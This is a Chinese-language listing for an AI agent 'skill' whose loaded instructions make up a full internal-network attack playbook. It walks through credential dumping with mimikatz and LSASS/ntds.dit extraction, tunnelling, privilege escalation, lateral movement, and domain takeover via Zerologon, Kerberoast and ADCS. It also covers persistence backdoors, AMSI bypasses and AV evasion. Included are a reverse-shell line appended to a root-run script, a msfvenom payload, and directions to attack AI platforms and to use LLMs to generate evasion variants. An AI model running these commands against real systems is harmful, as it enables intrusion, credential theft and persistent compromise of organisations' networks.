内网渗透测试深度技能

SkillAI & models

内网渗透测试深度专业技能:本地信息收集与凭证窃取(mimikatz/LSASS/ntds.dit)、内网探测与隐藏隧道(frp/Chisel/DNS/ICMP)、Windows/Linux提权、横向移动矩阵(IPC/WMI/DCOM/PSEXEC)、AD域渗透与域控接管(Zerologon/Kerberoast/ADCS)、权限维持与痕迹清除、免杀与C2、AI大模型内网攻击面(Ollama/vLLM/向量数据库/RAG/MCP/Agent)、AI辅助红队作战(路径分析/免杀增强/自动化)

Available today. Use it from your connected AI after setup.

Connect ahel once, and every AI you use reads what you have installed.

Then ask your AI: use the 内网渗透测试深度技能 skill

What this skill tells your AI

The instructions your AI receives, as published by langbyyi/cyberstrikeai-src in skills/intranet-penetration-testing/SKILL.md and read by ahel’s review.

AI LOAD INSTRUCTION: 内网渗透全链路专家打法。按已知前提:已获初始立足点。聚焦本地收集→凭据窃取→隧道→提权→横向→域渗透→维持的递进决策,域渗透细节由 active-directory-attack 细分包承接。维持/免杀类动作先过 authorized-attack-scope。

概述

内网渗透是攻防对抗的决胜战场——外网打点成功后,能否从一台主机走向整个内网、直至域控接管,取决于信息收集的深度、凭证获取的能力与攻击路径的规划。本技能以《安服内网渗透测试指南》为骨架,以资深攻防专家视角组织,覆盖本地信息收集→凭证窃取→内网探测→隐藏隧道→权限提升→横向移动→AD域渗透→权限维持→痕迹清除→免杀C2完整攻击链,并结合AI大模型能力补充两个前沿维度:AI大模型系统本身的内网攻击面(私有化LLM/Ollama/vLLM/向量数据库/RAG/MCP/Agent)与AI辅助红队作战(大模型驱动的信息分析、攻击路径规划、免杀增强与自动化)。

network-penetration-testing技能(全流程攻击链概览)互补:本技能聚焦内网阶段的高频实操细节与当代高端对抗手法。

一、本地信息收集(打点后的第一站)

原则:先本地后网络,先凭证后提权。本地信息收集决定后续所有攻击路径的可行性,10分钟的系统化收集胜过盲目扫描。

1.1 网络/系统/软件/服务信息

ipconfig /all                                                      :: 网卡/网关/DNS(域判断关键)
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"   :: OS版本与架构
echo %PROCESSOR_ARCHITECTURE%                                      :: 架构(影响payload选择)
wmic product get name,version                                      :: 安装软件清单(找可利用中间件)
wmic service list brief                                            :: 服务列表(找错误配置/第三方服务)
tasklist /svc                                                      :: 进程与服务关联(杀软/EDR/AV)
wmic startup get command,caption                                   :: 启动项(持久化线索/账密)
schtasks /query /fo LIST /v                                        :: 计划任务(常藏连接账号密码)
net session                                                        :: 本机与客户端的会话
netstat -anto                                                      :: 端口/连接(判断出网/服务)

1.2 用户与会话

net user                                                           :: 本机用户列表
net localgroup administrators                                      :: 本地管理员组(常含域用户)
query user                                                         :: 当前在线用户(RDP目标)
net user <username>                                                :: 用户详情(上次登录时间等)
whoami /all                                                        :: 当前权限与令牌信息(提权线索)
wmic useraccount get name,sid,disabled                             :: SID与禁用状态

1.3 补丁/防火墙/共享/路由

wmic qfe get Caption,HotFixID,InstalledOn                          :: 补丁列表(缺哪补丁→对应漏洞)
netsh advfirewall show allprofiles                                 :: 防火墙状态与规则
net share                                                          :: 本机共享(敏感共享泄露)
wmic share get name,path,status                                    :: 共享列表
route print                                                        :: 路由表(发现其他网段)
arp -a                                                             :: ARP缓存(活跃主机/网关)

高级arp -aroute print 是发现新网段的第一手情报——内网多网段边界机往往是跳板机的首选。

1.4 历史命令与登录记录

# Windows
# 每个用户的 .bash_history 类似物——PowerShell历史
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Linux(含大量敏感账号密码/IP/服务配置)
history
cat ~/.bash_history
grep -iE "pass|pwd|ssh|mysql|redis|token|secret" ~/.bash_history

RDP/SSH 外连记录定位运维人员

# Windows RDP外连记录(快速定位运维/管理员主机)
cmdkey /list                                     # 保存的凭据(可离线解密)
# SharpEventLog: 读取本机所有登录本机的计算机记录
# 位置: 注册表 HKCU\Software\Microsoft\Terminal Server Client\Servers
reg query "HKCU\Software\Microsoft\Terminal Server Client\Default"
reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s

# Linux SSH
cat ~/.ssh/authorized_keys                      # 谁曾免密登录过
cat ~/.ssh/id_rsa*                              # 私钥(可复用登录其他主机)
lastlog && last -a                              # 登录IP历史
cat ~/.ssh/config /etc/ssh/ssh_config           # 配置中的跳板/账号

1.5 杀软/EDR识别(决定免杀策略)

# 直接看进程
tasklist | findstr /i "360 kav avp mcshield egui safedog hws hipstray MsMpEng
  Norton symantec cccen NISUN x64 sysdiag 火绒 安天 深信服 奇安信 天擎
  QAX 微步 青藤 ossec alibaba aegis"
# 服务
wmic service get name,displayname,pathname | findstr /i "360 kav aegis"
# 驱动
driverquery /v | findstr /i "360 qutmips ysprotect sysdiag"
# PowerShell AMSI/CLM 状态
Get-MpComputerStatus 2>$null | Select RealTimeProtectionEnabled

决策链:识别杀软 → 判断有无EDR(是否有内核驱动/行为分析)→ 决定免杀强度与上线方式(进程注入/无文件/白利用)。

1.6 AI辅助信息收集分析

# 大模型快速处理原始输出:把 ipconfig/systeminfo/tasklist/wmic 输出丢给LLM,
# 让其标注: 1)可疑的高权限进程 2)可利用的第三方软件 3)缺失的关键补丁
# 4)网段关系图 5)杀软与免杀建议。省去人工逐行翻找的耗时。
# 典型提问示例(见第十三章AI辅助红队作战):
#  "分析以下 systeminfo 输出,列出可能存在的提权漏洞(给出CVE编号)"
#  "从这份 tasklist 中识别出所有安全软件及其类型(AV/EDR/HIPS)"

二、凭证窃取(密码是内网通行证)

内网渗透本质是凭证的收集与复用。一次抓取的明文密码/哈希可用于密码喷洒、撞库、PTH 与横向移动,价值远超单个系统权限。

2.1 Windows凭证窃取(mimikatz系列)

# 管理员/SYSTEM权限,先提权
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords          # 抓LSASS中登录凭据(明文+NTLM)

# Win10/2012R2+默认不存明文,开启WDigest后重启/重登可抓明文
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

LSASS 提取(mimikatz被拦时)

# Procdump(微软官方签名,白利用)
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# comsvcs.dll(lolbin,无文件落地)
tasklist | findstr lsass
rundll32 C:\windows\system32\comsvcs.dll MiniDump <LSASS_PID> dump.bin full
# 本地离线解析
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

注册表离线转储(无需内存操作)

reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\SECURITY security.hiv
# 离线用 mimikatz lsadump::sam /sam:sam.hiv /system:system.hiv 解密本机hash

域控ntds.dit(一次获取全域hash)

# ntdsutil 快照
ntdsutil snapshot "active instance ntds" create quit quit
ntdsutil snapshot "mount {GUID}" quit quit
copy C:\$SNAP_xxx\windows\ntds\ntds.dit c:\temp\ntds.dit
# vssadmin 卷影
vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\NTDS\ntds.dit c:\ntds.dit
# 离线解析(配合 SYSTEM hiv 解密hash)
secretsdump.py -ntds ntds.dit -system system.hiv LOCAL

绕过LSASS防护(LSA Protection/PPL)

# PPLdump(签名工具绕过PPL)
PPLdump64.exe <lsass_pid> lsass.dmp
# mimikatz + mimidriver 卸载PPL保护
mimikatz "!+" "!processprotect /process:lsass.exe /remove" privilege::debug sekurlsa::logonpasswords
# NanoDump: 免杀dump lsass(绕过AV)
nanodump.exe --write /tmp/lsass.dmp

2.2 Linux凭证窃取

# 内存明文(需root)
./mimipenguin                                                      # Kali/Ubuntu等
# shadow破解
unshadow /etc/passwd /etc/shadow > hash.txt && john hash.txt
# 环境变量/进程参数(常含密钥)
for p in /proc/[0-9]*/environ; do strings $p 2>/dev/null | grep -iE "pass|key|secret"; done
# 全盘搜索敏感信息
grep -rn "password=" /etc /home /root /var/www /opt 2>/dev/null
find / -iname "*.conf" -o -iname "*.properties" -o -iname "*.ini" 2>/dev/null | xargs grep -ilE "pass|secret|token"

2.3 常见软件/中间件凭证(一次性批量提取)

# 桌面软件凭据: Navicat/TeamViewer/FileZilla/WinSCP/Xshell/Xftp
SharpDecryptPwd.exe                                          # uknowsec
# 浏览器密码/Cookie/历史
HackBrowserData.exe                                          # moonD4rk(全平台)
BrowserGhost.exe /laZagne all                                # 奇安信QAX / LaZagne
SharpChromium.exe                                            # Cookie+登录凭据
mimikatz dpapi::chrome /in:"%localappdata%\...\Login Data" /unprotect
# WiFi密码
SharpWifiGrabber.exe / netsh wlan show profiles <name> key=clear
# 向日葵(内网远控高发)
Sunflower_get_Password.exe                                   # 识别码+验证码
# MSSQL各版本密码Hash
select name,password_hash from sys.sql_logins                # 2008R2+
select name,password from master.dbo.sysxlogins              # 2000
# Oracle/MySQL/Redis等弱口令+库内密码表(为撞库铺垫)

2.4 配置文件与数据库密文解密

# 中间件/应用配置(内网常见)
# Tomcat:      WEB-INF/classes/{db,jdbc,config,application}.properties + conf/tomcat-users.xml
# WebLogic:    Decrypt_Weblogic_Password(密文AES解密)
# 致远OA:      /opt/Seeyon/A8/base/conf/datasourceCtp.properties
# 用友NC:      /nchome/ierp/bin/prop.xml (ncDecode)
# 泛微OA:      D:\WEAVER\ecology\WEB-INF\prop\weaver.properties
# ActiveMQ:    /apache-activemq/conf/jetty-realm.properties
# 批量搜索明文敏感信息(Windows)
findstr /i /s /m "password" *.config *.ini *.xml *.properties *.yml *.yaml
# 搜索常见密钥文件
findstr /i /s /m "BEGIN RSA PRIVATE KEY\|BEGIN PRIVATE KEY" C:\*

2.5 云凭证

# SharpCloud: 检查 AWS/Azure/GCP 本地凭证文件
SharpCloud.exe
# 云元数据(若存在SSRF或本机可访问169.254.169.254)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/   # AWS
curl http://169.254.169.254/metadata/instance/compute?api-version=2021-02-01  # Azure
# 云CLI配置
type %USERPROFILE%\.aws\credentials   ;  cat ~/.aws/credentials
# 容器/K8s:ServiceAccount Token
cat /var/run/secrets/kubernetes.io/serviceaccount/token

2.6 凭证利用优先级(决策链)

1. 明文密码 > NTLM哈希 > Kerberos票据 > 会话令牌
2. 抓到密码后立即做: 密码喷洒(低频) → 撞库(内网所有资产) → PTH(同口令复用)
3. 优先尝试: 域管/Domain Admin组 → 本地管理员组 → 运维账号(sa/root/administrator)
4. 工具: crackmapexec(密码喷洒) / fscan -m <protocol> -pwd <dict> / Hydra

三、内网网络信息收集

3.1 存活主机探测

:: 内置命令(不出网/无工具环境)
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="
:: NetBIOS(可拿到主机名/用户名/MAC)
nbtscan.exe 192.168.1.0/24
:: ARP扫描(本机同网段,快且不易被发现)
arp-scan -l / Invoke-ARPScan.ps1 -CIDR 192.168.1.0/20
:: nmap存活探测(大并发)
nmap -sP --min-hostgroup 1024 --min-parallelism 1024 -iL ip.txt -oG alive.txt
:: UDP关键口(53/137/161)扫存活
nmap -sU -p 53,137,161 192.168.1.0/24

3.2 端口扫描与服务识别

# 全端口快速(通过代理)
proxychains nmap -sT -Pn -p- --min-rate 2000 10.10.10.0/24 -oN full.txt
# 关键端口定向
nmap -sT -Pn -p 21,22,23,53,80,135,139,445,443,1433,1521,3306,3389,
  5432,5900,6379,7001,8080,8443,9200,11211,2181,27017,5000,11434,19530 10.10.10.0/24
# 服务指纹
nmap -sT -Pn -sV -p 445,1433,3306,6379 10.10.10.10
# UDP服务(SNMP/Syslog等)
nmap -sU -sV -p 53,161,137,139,500,1617,1900 10.10.10.10

3.3 常见端口高危服务速查(内网横向重点)

端口服务攻击面
445/139SMBMS17-010/SMBGhost、弱口令、未授权共享、PTH
3389RDP弱口令、BlueKeep(CVE-2019-0708)、NLA绕过
22SSH弱口令、私钥复用、隧道代理
1433MSSQLsa弱口令、xp_cmdshell提权、链接服务器
3306MySQL弱口令、UDF提权、未授权
6379Redis未授权RCE(写公钥/计划任务/主从复制)
27017MongoDB未授权访问
9200Elasticsearch未授权、RCE(CVE-2015-1427)
11211Memcached未授权、DRDoS反射
2181ZooKeeper未授权访问(配置/会话泄露)
7001/7002WebLogic反序列化(T3/IIOP)、弱口令
8080/8089Tomcat/JBoss/Jenkins弱口令、反序列化、后台部署
1099Java RMI反序列化
873Rsync匿名访问、文件读取
50000SAP远程代码执行
8069Zabbix弱口令、监控命令执行
2181/9092Kafka未授权、消息窃取
11434OllamaLLM服务未授权(见12.1)
19530/8000向量库/推理服务AI服务未授权(见12.1/12.2)

3.4 综合扫描工具(内网渗透标配)

# fscan(最常用:存活+端口+弱口令+Web漏洞+MS17-010一站式)
fscan.exe -h 10.10.10.0/24                          # 全模块
fscan.exe -h 10.10.10.0/24 -nobr -nopoc             # 静默模式(减少流量)
fscan.exe -h 10.10.10.0/24 -m smb -pwd password     # 指定模块/密码碰撞
fscan.exe -h 10.10.10.0/24 -rf id_rsa.pub           # redis写公钥
fscan.exe -hf ip.txt -o result.txt                  # 批量导入+结果输出
# LadonGo(一键C/B/A段:存活/指纹/爆破/高危漏洞/远程执行)
Ladon 10.10.10.8/24 MS17010 ; Ladon 10.10.10.8/24 PortScan
# netspy(网段发现,适合大内网横向扩张)
netspy is                       # icmp全自动探测 10/172.16/192.168 段
netspy ts -p 22 -p 3389         # tcp探测
# Yasso(红队辅助工具集,含代理与并发)
Yasso.exe all -H 10.10.10.1/24

3.5 网段发现与扩张(高级)

# 网段来源:路由表、ARP缓存、DHCP分配、DNS记录(domain controllers)、
# 服务器多网卡、云VPC网段、容器网络(172.17.0.x/10.244.x.x)
# 多网段主机 = 跳板机首选
# 大内网:按 网关存活→B段/C段 逐层推进,先打管理网段(运维/堡垒机/监控)再打业务网段
# AI辅助:把路由表/ARP/探测结果给LLM生成网段拓扑图与推进顺序建议

四、隐藏通信隧道

4.1 连通性判断

# 分别测试各协议出网(内网边界/防火墙策略)
ping 8.8.8.8                       # ICMP
curl -x http://<vps>:8080 http://example.com   # HTTP(S)代理出网
nslookup <dnslog>.dnslog.cn <vps_ip>           # DNS出网(仅53)
nc -vz <vps> 53 ; nc -vz <vps> 443             # TCP端口出网
# 判断进网:能否被外网直接访问(映射/公网IP/云负载均衡)

出网方式直接决定隧道选型:能直连外网→frp/EW仅HTTP(S)→reGeorg/Chisel仅DNS→dnscat2/iodine仅ICMP→icmpsh/ptunnel

4.2 隧道工具矩阵

工具场景特征
frp通用TCP/SOCKS代理,稳定特征明显,需混淆/加壳
Chisel单二进制,HTTP/WS封装,穿透性强建议over WSS
Neo-reGeorgWebShell环境(php/jsp/aspx)流量走HTTP隧道
nps/pystinger多级代理/EDR环境(毒刺免杀好)支持内网级联
EarthWorm(EW)老牌正向/反向/多级代理静态特征多,慎用
Venom多级代理+端口转发模块化
lcx端口转发(3389映射出网)明文,易被查杀
SSH-L/-R/-D 本地/远程/动态转发有SSH入口首选
netsh portproxyWindows自带端口转发无文件落地
icmpsh/ptunnelICMP隧道严格防火墙下保底
dnscat2/iodineDNS隧道仅DNS出网

4.3 代理搭建实战

# frp SOCKS5
# frps.ini(服务端VPS)
[common]
bind_port = 7000
token = s3cr3t
# frpc.ini(内网主机)
[common]
server_addr = <vps>
server_port = 7000
token = s3cr3t
[socks5]
type = tcp
remote_port = 6000
plugin = socks5
# 本地使用
proxychains nmap -sT -Pn 10.10.10.0/24

# Chisel 反向代理(单文件,静态二进制,配合TLS混淆)
chisel server -p 8080 --reverse                # VPS
chisel client wss://<vps>:8080 R:socks         # 内网主机(WS封装过WAF)

# Neo-reGeorg(WebShell场景)
python neoreg.py generate -k password          # 生成隧道脚本上传
python neoreg.py -k password -u http://target/tunnel.jsp -l 127.0.0.1 -p 1080

# SSH动态转发(有SSH权限时最优雅)
ssh -CfNg -D 1080 user@target

4.4 内网级联代理(多跳)

# 场景: A(边界) → B(核心网) → C(隔离网)
# 级联方式: B上跑二级frps → 本地proxychains链到B → B上proxychains链到C
# 或 pystinger/nps 支持的内网级联: agent→proxy→二级agent
# 工具链: frp多级 / nps / pystinger / ssh ProxyJump(-J)
ssh -J userA@A,userB@B userC@C -D 1080        # SSH JumpHost级联

4.5 隧道检测规避(攻防对抗视角)

- 尽量使用标准协议封装: WSS(Chisel)/DNS(iodine)/ICMP(icmpsh)
- 低频率小流量: 避开流量监控的"突发隧道"特征
- 端口复用: 走已开放的80/443/53端口
- 域前置/DNS over HTTPS 规避内容检测
- 定期轮换端口与证书,避免长期固定特征
- 避免使用已知静态签名的老工具(EW/lcx/cobaltstrike默认特征)

五、Windows权限提升

5.1 BypassUAC

# 场景: 本地管理员账号但UAC限制(高权限命令被拦)
# 手法: IFileOperation COM / eventvwr.exe注册表劫持 / sdclt.exe /
#       SilentCleanup(磁盘清理任务) / cmstp.exe / 环境变量劫持高权限.NET程序
# 工具: UACME(Akagi64) / SharpBypassUAC / Bypass-UAC(FuzzySecurity)
UACME\Akagi64.exe 23                                # 常用UAC绕过payload编号

5.2 内核漏洞提权

# 依据systeminfo补丁列表 → 匹配未修补CVE
# 常用: CVE-2020-1472(Zerologon,域控) / CVE-2021-21551(dell驱动) /
#       PrintNightmare CVE-2021-34527(打印服务) / CVE-2022-21999(SpoolFool)
# 工具集: Kernelhub / Windows-Exploits / windows-exploit-suggester
python windows-exploit-suggester.py -d 2021-01-01-db -i systeminfo.txt

5.3 服务与数据库提权

# 数据库提权(内网高发)
# MSSQL: sa弱口令 → xp_cmdshell / CLR / 代理作业
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE
EXEC master..xp_cmdshell 'whoami'
# MySQL: UDF提权(需写权限+plugin目录) / 日志getshell / 弱口令
# Oracle: oracleShell / JavaSource(高权限DBMS_JAVA)
# 工具: SharpSQLTools / MDUT / Sylas
# 服务配置提权
# 可写服务路径 → 替换服务二进制/放恶意DLL
wmic service get name,pathname | findstr /i "c:\\program files"
# 未引号服务路径
wmic service get name,pathname | findstr /v "C:\\Windows\\system32" | findstr /v /i "c:\\program"
# 可写注册表服务键 / 可写文件路径服务

5.4 错误配置提权

# 可写文件/文件夹 + SYSTEM运行的服务
icacls "C:\Program Files\xxx"                # Everyone:(F) 等
# 计划任务可写脚本
schtasks /query /fo LIST /v | findstr /i "task run as"
# 任意用户以SYSTEM安装MSI(AlwaysInstallElevated)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/x64/meterpreter/reverse_tcp -f msi -o evil.msi
# 服务令牌提升 SeImpersonatePrivilege(见5.5)

5.5 Potato家族提权(SeImpersonatePrivilege)

# whoami /priv 查看: SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege → Potato
# Windows Server 2016/2019 + 高版本: PrintSpoofer / GodPotato / EfsPotato / SweetPotato
# (RottenPotato/JuicyPotato已不适用于新系统)
PrintSpoofer.exe -i -c cmd.exe
GodPotato -cmd "cmd /c whoami"
# 域控提权漏洞(CVE): noPac(CVE-2021-42278/42287) / Zerologon(CVE-2020-1472) 见第八章

5.6 提权自动化与AI辅助

# 自动枚举: WinPEAS / PowerUp / PrivescCheck / BeRoot
winpeas.exe quiet
. .\PowerUp.ps1; Invoke-AllChecks
# AI辅助: 把WinPEAS输出粘贴给LLM → 让它按可利用性排序并给出利用链

六、Linux权限提升

6.1 内核提权

uname -a && cat /etc/os-release
# 常见: CVE-2021-4034(Polkit pkexec,通杀) / CVE-2021-3156(sudo Baron Samedit) /
#       CVE-2022-0847(Dirty Pipe) / CVE-2023-4911(GLIBC Looney Tunables) /
#       CVE-2024-1086(nf_tables UAF)
# 工具: linux-exploit-suggester(les.sh) / linux-smart-enumeration(lse.sh)
./les.sh

6.2 SUID/计划任务/Cron

find / -perm -4000 -type f 2>/dev/null                     # SUID(gtfobins核对)
find / -perm -2000 -type f 2>/dev/null                     # SGID
ls -alh /var/spool/cron* /etc/cron* /etc/crontab           # 可写Cron脚本→命令注入
cat /etc/cron.d/* /etc/at.allow /etc/at.deny
# 可写脚本被root执行 → 反弹shell
echo 'bash -i >& /dev/tcp/<vps>/4444 0>&1' >> /usr/local/bin/backup.sh

6.3 错误配置与明文凭证

# 可写敏感文件 / 弱权限服务配置
cat /etc/passwd | grep -v nologin                          # 可登录用户
sudo -l                                                    # 当前sudo权限
ls -la /etc/shadow /etc/sudoers                            # 弱权限
grep -rE "password|passwd|secret" /home /var/www /opt /etc/init.d 2>/dev/null
# Docker组 / 特权容器 / K8s SA(见container-security-testing技能)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh         # docker组提权

七、横向移动矩阵

7.1 内网脆弱面(横向第一波)

# 顺序: 弱口令爆破 → 未授权访问 → 中间件RCE → MS17-010 → 密码撞库
# 弱口令: SSH/RDP/MSSQL/MySQL/Redis/Oracle/VNC/SMB/PostgreSQL
# 未授权: Redis / MongoDB / Elasticsearch / Memcached / ZooKeeper / Kafka / Hadoop YARN
# 中间件RCE: WebLogic(T3/IIOP) / JBoss / Tomcat部署 / Jenkins / ActiveMQ
# 批量自动化: fscan -nobr -nopoc 快速摸底, 再对结果定点利用
# 撞库: 用已获取的密码库批量碰撞所有资产(同口令复用率极高)

7.2 Windows远程执行技术(横向核心)

# IPC$ 建立连接
net use \\10.10.10.10\ipc$ "password" /user:domain\user
# 计划任务执行(老系统)
copy mu.exe \\10.10.10.10\C$ ; at \\10.10.10.10 15:15 C:\mu.exe
# schtasks(新系统)
schtasks /create /s 10.10.10.10 /tn test /sc onstart /tr c:\mu.exe /ru system /f
schtasks /run /s 10.10.10.10 /i /tn test
# PSEXEC(释放psexesvc服务,特征明显)
psexec \\10.10.10.10 -accepteula -u user -p pass cmd.exe
# impacket-psexec / smbexec (Python版,服务名可自定义混淆)
python3 psexec.py domain/user:pass@10.10.10.10
python3 smbexec.py domain/user:pass@10.10.10.10 -service-name 5A1n6
# WMI(无回显,配合IPC写文件读结果)
wmic /node:10.10.10.10 /user:admin /password:pass process call create "cmd.exe /c ipconfig > ip.txt"
wmiexec.py domain/user:pass@10.10.10.10
# DCOM(免上传文件)
$com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.10"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null," /c calc.exe","")
# WinRM(5985/5986,走HTTP)
evil-winrm -i 10.10.10.10 -u user -p pass
# 哈希传递PTH(拿到NTLM后无需明文)
crackmapexec smb 10.10.10.0/24 -u admin -H <ntlm_hash> --exec-method smbexec -x whoami
psexec.py -hashes :<ntlm_hash> domain/admin@10.10.10.10

7.3 Bypass AMSI

# 场景: PowerShell被AMSI拦截 → 横向脚本无法执行
# 1) 降级PS2.0(老系统)
powershell -version 2 -nop -c "IEX (...)"
# 2) 内存Patch AmsiScanBuffer(常见bypass脚本)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# 3) 注册表禁用(高权限)
Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\Script\Settings -Name AmsiEnable -Value 0
# 4) 反射加载绕过(流量混淆+内存Patch), 工具: AMSI.fail在线生成变体
# AI辅助: 让LLM生成多种AMSI bypass变体用于AV/EDR测试(见11.3)

7.4 利用运维通道(高价值横向)

# 补丁服务器/软件分发: 投递恶意更新包或替换安装源
# EDR主控端: 若攻陷EDR管理端 → 全内网定向下发执行(隐蔽且高权限)
# 堡垒机: 堡垒机失守 = 全内网运维通道沦陷(需先拿堡垒机密码库)
# 跳板机/运维终端: 常保存大量运维账号与免密通道
# 监控平台(Zabbix/Prometheus/Grafana): 命令执行/配置注入
# 虚拟化平台(vCenter/ESXi/Proxmox/K8s): 见7.5
# 注意: 上述路径动静极大,先评估攻击噪音再决策

7.5 虚拟化/监控/邮件平台后渗透

# vCenter(拿到root后):
# 1) 从 data.mdb 提取IdP证书伪造SAML管理员cookie
#    (Linux: /storage/db/vmware-vmdir/data.mdb ; Win: C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb)
#    vcenter_ExtraCertFromMdb.py → vcenter_GenerateLoginCookie.py
# 2) 通过快照/虚拟机内存取证dump凭证 → PTH
# 3) CVE-2021-21972/21985等未授权RCE
# Zabbix: 弱口令 → 监控项命令执行(Server权限)
# Exchange: ProxyLogon(2021-26855)/ProxyShell链/Exchange2domain/NtlmRelayToEWS(横向至域管)
#   → 可读邮箱、重置域用户密码、滥用Exchange写ACL

7.6 AI大模型平台横向(新战场)

# 内网AI平台往往集中部署 GPU 算力 + 敏感训练/推理数据,攻击价值极高:
# 1) 未授权LLM服务(Ollama/vLLM/LM Studio) → 直接调用推理/拉模型(见12.1)
# 2) 向量数据库未授权 → 全量导出RAG知识库(内部文档/源码/凭证)(见12.2)
# 3) AI平台后台弱口令(Dify/FastGPT/Langflow/MaxKB) → 管理所有知识库与模型
# 4) MCP/Agent服务暴露 → 工具调用滥用(文件/数据库/内网HTTP)(见12.3)
# 5) 模型文件本身: 从存储/备份拉取权重与微调数据

八、AD域渗透

8.1 域信息收集

ipconfig /all                                   :: 主DNS后缀=域名
nslookup <domain>                               :: 与DNS同IP即域控
net time /domain                                :: 存在域则返回域控名
net view /domain                                :: 域列表
net view /domain:XXX                            :: 域内计算机
net group "domain controllers" /domain          :: 域控列表
net user /domain                                :: 域用户列表
net localgroup administrators                   :: 本地管理员组(含域账号)
wmic useraccount get /all                       :: 域用户详情
dsquery user -limit 0                           :: 全量用户
nltest /DCLIST:XXX                              :: 域控机器名

高级枚举(BloodHound 数据采集)

# SharpHound 采集(全量关系图)
SharpHound.exe -c All --zipfilename bh.zip
# 分析: 导入BloodHound → 查找 "Shortest Path to Domain Admins"
# AI辅助: 把SharpHound结果/cypher查询结果给LLM解释攻击路径(见13.1)

8.2 获取域控方法(攻击路径优先级)

方法原理工具
DCSync域管/复制权限 → 拉取全域hashmimikatz lsadump::dcsync / impacket secretsdump
Zerologon(CVE-2020-1472)重置域控机器密码 → 直接接管mimikatz/impacket
noPac(CVE-2021-42278/42287)SAM-Account-Name混淆 → 域管票据noPac.py / sam-the-admin
Kerberoast服务账户SPN票证离线破解GetUserSPNs + hashcat -m 13100
AS-REP Roasting无预认证用户离线破解GetNPUsers.py + hashcat -m 18200
GPP(组策略偏好)SYSVOL中cpassword AES可解gpp-decrypt
委派滥用无约束/约束/资源委派Rubeus / impacket
SSP截获域控上注入SSP抓明文mimikatz misc::memssp
票据投递PTT域管票据注入Rubeus ptt / mimikatz kerberos::ptt
Exchange ACL高权限组写ACL(WriteDacl)Exchange ADSync / PrivExchange

8.3 Kerberos高级攻击

# Kerberoasting(服务账户爆破)
python3 GetUserSPNs.py -request domain/user:pass -outputfile hash.txt
hashcat -m 13100 hash.txt wordlist.txt
# AS-REP Roasting(不需要密码)
python3 GetNPUsers.py domain/ -usersfile users.txt -format hashcat -outputfile asrep.txt
hashcat -m 18200 asrep.txt wordlist.txt
# 委派滥用(约束委派→域管)
python3 findDelegation.py domain/user:pass
python3 getST.py -spn cifs/DC.domain domain/user:pass -impersonate administrator -dc-ip <DC>
python3 wmiexec.py -k -no-pass domain/administrator@DC.domain
# 黄金票据(需要krbtgt hash,伪造任意用户)
mimikatz "kerberos::golden /user:administrator /domain:xxx /sid:xxx /krbtgt:<hash> /ptt"
# 白银票据(服务票据伪造,免接触KDC)
mimikatz "kerberos::golden /user:xxx /service:cifs /target:DC /rc4:<hash> /ptt"
# 票据传递PTT
Rubeus.exe ptt /ticket:<base64>

8.4 ADCS/ACL/GPO滥用(当代主流)

# ADCS(证书服务) ESC1-ESC8: 配置不当CA签发高权限证书
certipy find -u user@domain -p pass -dc-ip <DC> -vulnerable
# ESC1: 用户可请求任意SAN证书 → 冒充域管
certipy req -u user@domain -p pass -ca CA-NAME -target <CA> -template ESC1 -upn administrator@domain
certipy auth -pfx admin.pfx -dc-ip <DC>
# ACL滥用: GenericAll/WriteDacl/ForceChangePassword → 提权/接管
bloodyAD -d domain -u user -p pass add genericAll user2:target
python3 dacledit.py -action write -rights GenericAll -principal user -target 'Domain Admins' domain/user:pass
# GPO滥用: 创建/修改GPO → 下发计划任务/脚本全域执行
# (需具有GPO编辑权限,SharpGPOAbuse)
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount victim --GPOName "Default Domain Policy"
# 常见错误配置: gMSA密码、SPN账户、MachineAccountQuota(默认10,可机器账户→ESC)

8.5 域内后渗透与域管定位

# 域管定位(找域管登录过的主机)
psloggedon.exe \\10.10.10.10 /l
# BloodHound: Shortest Path to Domain Admins / 高价值目标(备份/管理主机)
# 获取域管hash后: 全域PTH/PTT清扫 → 逐台登录拿SYSTEM → 全域拿下
# 域管hash破解优先级: krbtgt(金票) > 域管组成员 > 服务账户
# 域内敏感信息: SYSVOL脚本、共享文件、邮件、备份文件(常含明文密码)
# AI辅助: 汇总所有收集结果 → LLM生成"域管接管最短路径"作战方案

九、权限维持

9.1 Windows持久化

# 用户态: 注册表Run键 / 计划任务 / 启动文件夹 / WMI事件订阅 / DLL劫持
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /d "C:\backdoor.exe" /f
schtasks /create /tn backdoor /tr C:\backdoor.exe /sc onlogon /ru SYSTEM /f
# 服务持久化(删除普通用户访问权限)
sc create backdoor binPath= C:\backdoor.exe start= auto
# 系统态: 服务/驱动(以SYSTEM权限,隐蔽)
# 域持久化: 黄金票据 / 域管账户克隆(ACL DCSync) / Skeleton Key / SSP
